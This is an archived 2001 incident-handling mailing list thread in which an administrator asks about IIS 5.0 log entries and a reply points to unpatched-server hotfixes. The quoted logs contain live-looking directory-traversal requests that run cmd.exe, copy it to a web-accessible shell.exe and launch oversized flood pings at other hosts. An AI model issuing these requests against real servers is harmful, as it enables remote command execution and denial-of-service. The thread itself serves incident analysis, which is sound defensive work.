Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Subject: Unicode Logs with Ping Activity

From: gattaca () hushmail com
Date: Tue, 10 Jul 2001 13:56:05 -0500 (EDT)
It would appear that yout IIS webserver is not patched. Sorry I'm not sure 
of the correct "hotfix" but you can find them at 
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/current.asp 
and select "IIS"

502 Bad Gateway 
"The server, in the role of a gateway or proxy, received an invalid response 
from the upstream server while attempting to fulfill the request."

http://www.liquidmatrix.org/HTTPsc.htm

hope this helps somewhat,
gattaca

----------------------
liquidmatrix.Org
----------------------

------------------------------------------------------------------------
------
From: myrddin_e () hushmail com 
Date: Tue, 10 Jul 2001 08:24:50 -0800 (PDT) 
To: incidents () securityfocus com 
Subject: Unicode Logs with Ping Activity 


Would like someone to help me understand what is going on here... The 502 
error at the end end of these entries would indcicate failures, wouldn't 
they? I've been all through the logs on this box, and even thought at every 
attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe 
shows a 502, it is there.


I'm looking at the times on the log entries and guessing that this was a 
manual attack.


Also, can someone please explain what is being attempted with these pings?
aaa.aaa.aaa.aaa
bbb.bbb.bbb.bbb
ccc.ccc.ccc.ccc.ccc
ddd.ddd.ddd.ddd.ddd 
are all unique addresses.


#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-06-19 18:44:15
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-
uri-query sc-status cs(User-Agent) 
2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
/c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 
502 -
Free, encrypted, secure Web-based email at www.hushmail.com


------------------------------------------------------------------------
----



This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com 
Free, encrypted, secure Web-based email at www.hushmail.com


----------------------------------------------------------------------------


This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see:

http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: